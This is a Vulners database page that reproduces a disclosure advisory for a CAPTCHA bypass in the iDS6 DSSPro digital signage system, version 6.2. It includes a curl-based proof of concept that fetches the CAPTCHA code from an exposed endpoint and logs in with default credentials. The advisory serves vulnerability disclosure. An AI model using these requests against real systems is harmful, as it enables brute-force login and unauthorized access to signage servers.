Vulners
Lucene search
iDS6 DSSPro Digital Signage System 6.2 CAPTCHA Security Bypass
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2020-37228 | 16 May 202615:25 | – | attackerkb |
 | CVE-2020-37228 | 16 May 202618:55 | – | circl |
 | Yerootech iDS6 DSSPro Digital Signage System 安全漏洞 | 16 May 202600:00 | – | cnnvd |
 | CVE-2020-37228 | 16 May 202615:25 | – | cve |
 | CVE-2020-37228 iDS6 DSSPro Digital Signage System 6.2 CAPTCHA Security Bypass | 16 May 202615:25 | – | cvelist |
 | EUVD-2020-31229 | 16 May 202615:25 | – | euvd |
 | CVE-2020-37228 | 16 May 202616:16 | – | nvd |
 | PT-2026-41428 | 16 May 202600:00 | – | ptsecurity |
 | CVE-2020-37228 iDS6 DSSPro Digital Signage System 6.2 CAPTCHA Security Bypass | 16 May 202615:25 | – | vulnrichment |
<html><body><p>iDS6 DSSPro Digital Signage System 6.2 CAPTCHA Security Bypass
Vendor: Guangzhou Yeroo Tech Co., Ltd.
Product web page: http://www.yerootech.com
Affected version: V6.2 B2014.12.12.1220
V5.6 B2017.07.12.1757
V4.3
Summary: iDS6 Software's DSSPro network digital signage management
system is a web-based server software solution for Windows.
Desc: The CAPTCHA function for DSSPro is prone to a security bypass
vulnerability that occurs in the CAPTCHA authentication routine. By
requesting the autoLoginVerifyCode object an attacker can receive a
JSON message code and successfully bypass the CAPTCHA-based authentication
challenge and perform brute-force attacks.
Tested on: Microsoft Windows XP
Microsoft Windows 7
Microsfot Windows Server 2008
Microsoft Windows Server 2012
Microsoft Windows 10
Apache Tomcat/8.0.44
Apache Tomcat/6.0.35
Apache-Coyote/1.1
Apache Axis/1.4
MySQL 5.5.25
Java 1.8.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5607
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5607.php
16.07.2020
--
Get CAPTCHA code:
-----------------
$ curl -i http://192.168.1.88/Pages/login\!autoLoginVerifyCode -c cookies.txt
{"success":true,"message":"6435","data":"6435"}
Use CAPTCHA code:
-----------------
$ curl -i http://192.168.1.88/Pages/login\!userValidate -b cookies.txt -d "shortName=&user.userName=boss&user.password=boss&loginVerifyCode=6435&autoSave=true&autoLogin=true&domain_login=" -v
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: cookie.username=boss; Expires=Wed, 21-Jul-2021 19:41:26 GMT
Set-Cookie: cookie.password=boss; Expires=Wed, 01-Jul-2021 19:41:26 GMT
Set-Cookie: cookie.autosave=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT
Set-Cookie: cookie.autologin=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/x-json;charset=UTF-8
Date: Tue, 21 Jul 2020 19:41:26 GMT
Connection: close
Content-Length: 16
{"success":true}
</p></body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Nov 2020 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 49.3
CVSS 3.19.8
EPSS0.00429
SSVC